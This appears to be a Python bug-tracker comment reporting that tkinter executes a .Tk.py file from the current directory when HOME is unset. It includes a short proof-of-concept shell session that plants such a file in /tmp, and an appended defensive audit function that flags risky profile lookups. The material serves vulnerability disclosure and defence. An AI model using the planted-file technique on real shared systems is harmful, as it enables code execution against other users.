Stefan Krah added the comment:

I also don't find the scenario where an attacker has write privileges
to a user's home directory so disturbing -- there are juicier targets
(like .bashrc).


This constructed example using /tmp is a little more troubling:

$ cd /tmp
$ echo 'print("exploit")' > .Tk.py
$ export XAUTHORITY=$HOME/.Xauthority
$ unset HOME
$ python3.3

>>> import tkinter
>>> w = tkinter.Tk()
/usr/local/lib/python3.3/tkinter/__init__.py:1817: ResourceWarning: unclosed file <_io.TextIOWrapper name='./.Tk.py' mode='r' encoding='ANSI_X3.4-1968'>
  exec(open(class_py).read(), dir)
exploit

----------

_______________________________________
Python tracker <rep...@bugs.python.org>
<http://bugs.python.org/issue16248>
_______________________________________
_______________________________________________
Python-bugs-list mailing list
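
Added example, not part of the comment above and not tkinter's own code: a defender-side audit that reports which profile file would be picked up for a given environment and working directory, and why that lookup is risky. The name audit_tk_profile, its parameters and the reason strings are hypothetical; the rule it assumes (profile directory is $HOME when set, otherwise the current directory) is the one the session above shows.

```python
import os
import stat

def audit_tk_profile(environ, cwd, names=(".Tk.py",), uid=None):
    """Report which profile files would be looked up, and why each lookup is risky.

    Assumed rule (from the session above): $HOME if set, else the current directory.
    """
    uid = os.getuid() if uid is None else uid
    fallback = "HOME" not in environ
    home = os.curdir if fallback else environ["HOME"]
    # A relative or empty HOME also resolves against the current directory.
    directory = os.path.abspath(os.path.join(cwd, home))
    try:
        dst = os.stat(directory)
    except OSError:
        return []  # directory missing: nothing can be loaded from it
    dir_reasons = []
    if fallback:
        dir_reasons.append("HOME unset, current directory searched")
    elif not os.path.isabs(home):
        dir_reasons.append("HOME is relative, resolved against current directory")
    if dst.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        dir_reasons.append("directory writable by group or other")
    if dst.st_uid != uid:
        dir_reasons.append("directory owned by uid %d" % dst.st_uid)
    findings = []
    for name in names:
        path = os.path.join(directory, name)
        reasons = list(dir_reasons)
        try:
            fst = os.lstat(path)  # lstat: a symlink planted by another user is flagged too
        except OSError:
            fst = None
        if fst is not None and fst.st_uid != uid:
            reasons.append("file owned by uid %d" % fst.st_uid)
        if fst is not None and stat.S_ISLNK(fst.st_mode):
            reasons.append("file is a symlink")
        findings.append({"path": path, "exists": fst is not None, "reasons": reasons})
    return findings

if __name__ == "__main__":
    import tempfile
    shared = tempfile.mkdtemp()      # constructed stand-in for /tmp
    os.chmod(shared, 0o1777)         # world-writable with sticky bit, like /tmp
    open(os.path.join(shared, ".Tk.py"), "w").close()
    for finding in audit_tk_profile({}, shared):   # environment without HOME
        print(finding)
```
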